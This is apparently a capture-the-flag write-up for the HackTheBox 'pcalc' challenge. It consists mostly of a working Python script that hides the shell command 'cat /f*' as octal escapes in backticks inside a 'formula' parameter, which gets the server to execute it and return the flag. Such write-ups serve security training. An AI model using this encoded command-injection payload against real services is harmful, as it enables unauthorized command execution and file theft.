HackTheBox pcalc Challenge

2025-01-31[Updated: 2025-01-31]

https://app.hackthebox.com/challenges/542

Description

A calculator service has been deployed at an enemy’s agency, for their personel to be acquainted with human numbers. We need to inflitrate the application and get access to the secret flag stored inside it’s system!

Exploitation

#!/usr/bin/env python3
import requests,re,sys

def generate_payload():
    command = "cat /f*"
    octal_bytes = ['\\' + format(ord(char), 'o') for char in command]
    payload = f"`{''.join(octal_bytes)}`"
    return payload

def exploit(url):
    payload = generate_payload()
    print(f"[*] Generated payload: {payload}")
    try:
        r = requests.get(f"{url}/?formula={payload}")
        flag = re.findall(r'HTB{[^}]+}', r.text)
        if flag:
            print(f"[+] Found flag: {flag[0]}")
        else:
            print("[-] No flag found in response")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    url = sys.argv[1]
    target = f"http://{url}"
    exploit(target)

Summary

pcalc: identify the broken request handling, prove control, and use it to recover the flag.